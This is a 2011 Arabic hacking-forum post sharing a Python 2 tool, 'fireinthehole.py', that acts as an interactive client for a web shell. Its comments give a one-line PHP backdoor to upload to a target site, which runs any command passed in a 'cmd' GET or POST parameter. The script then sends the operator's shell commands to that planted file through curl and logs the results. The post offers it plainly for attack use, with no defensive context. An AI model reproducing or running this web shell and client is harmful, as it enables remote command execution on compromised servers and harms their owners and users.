التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 07-04-2011, 07:21 AM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
الصورة الرمزية bleu moon
 

 

 
إحصائية العضو








bleu moon غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 12
bleu moon is on a distinguished road

افتراضي Interactive HTTP GET and POST Shell


كود:
#!/usr/bin/python
#
# Malformation's  Interactive   HTTP  GET and  POST   Shell  - 
fireinthehole.py
#
# Upload something like this to a php file:
# <?php if (isset($_POST["cmd"])) { system($_POST["cmd"]); } ?>
# <?php if (isset($_GET["cmd"])) { system($_GET["cmd"]); } ?>
#
# Kisses go to .aware, OTW, STS, darkc0de, str0ke and some Aussies
# Please don't strip the credits out if you modify or redistribute.

import sys, os, time

print '''
        Malformation's  Interactive   HTTP  GET and  POST  Shell
        Version - 1.0.0a

        Tries to maintain current working directory when you use 'cd'.
        
        Usage:
        \tEnter the host => hacked.com/hacked.php
        \tEnter the  POST  variable => cmd
        \thacked.com/hacked.php# ls -la
        \ttotal 12880
        \tdrwxr-xr-x  2 web    web        4096 2009-11-03 11:54 .
        \tdrwxr-xr-x 15 root    root        4096 2009-10-08 13:37 ..
        \t-rw-r--r--  1 web    web         481 2009-11-02 18:58 hacked.php
        \thacked.com/hacked.php# .
        \tBye.
'''

# # # # # Configuration # # # # # #
# 0 to turn off curl verbosity    #
debug = 1                         #
# # # # # # # # # # # # # # # # # #

write = 0
curl_array = ["/bin/", "/usr/bin/", "/usr/sbin/"]
curl_dirs = ""
count = 0
finalcommand = ""
dir_array = []

for i in range(0,len(curl_array)):
        if (os.path.exists(curl_array[i] + "curl")):
                count = count + 1
                curl_dirs = curl_dirs + curl_array[i] + " "

if (count == 0):
        print "Couldn't find curl. Tried looking in " + curl_dirs
        sys.exit(0)
        
try:
        if (os.path.exists("fireinthehole.txt")):
                file = open("fireinthehole.txt","a")
        else:
                file = open("fireinthehole.txt","w")
        print "Output will be saved to fireinthehole.txt"
        write = 1
except IOError:
        print "Directory not writable, output will not be saved."

try:
        host = raw_input("Enter the host => ")
        method = raw_input("GET/POST => ")
        if (method == "GET"):
                myvar = raw_input("Enter the GET variable => ")
        elif (method == "POST"):
                myvar = raw_input("Enter the  POST  variable => ")
        else:
                sys.exit(0)
        while True:
                mycommand = raw_input(host + "# ")
                finalcommand = ""
                if (mycommand == "."):
                        print "Bye."
                        sys.exit(0)
                mycommand = mycommand + "; "
                if (mycommand[0] + mycommand[1] + mycommand[2] == "cd "):
                        dir_array.insert(len(dir_array) + 1, mycommand)
                        if (method == "GET"):
                                string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + 
"\""
                        else:
                                string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + 
host
                        if (debug == 1):
                                print string + ":\n"
                        continue
                if (len(dir_array) != 0):
                        for j in range(0,len(dir_array)):
                                finalcommand = finalcommand + dir_array[j]
                        finalcommand = finalcommand + mycommand
                if (finalcommand != ""):
                        mycommand = finalcommand
                if (method == "GET"):
                        string = "curl -s \"" + host + "?" + myvar + "=" + mycommand + 
"\""
                else:
                        string = "curl -s -d \"" + myvar + "=" + mycommand + "\" " + host
                if (debug == 1):
                        print string + ":\n"
                command = os.popen(string,"r")
                if (write == 1):
                        file.write(host + "# " + mycommand + "\n")
                while(1):
                        line = command.readline()
                        line = line.strip()
                        if line:
                                print line
                                if (write == 1):
                                        file.write(line + "\n")
                        else:
                                break
except KeyboardInterrupt:
        print "\nBye."
        sys.exit(0)

except:
        print "Unhandled exception"
        sys.exit(0)



Interactive HTTP GET and POST Shell

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 10:11 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0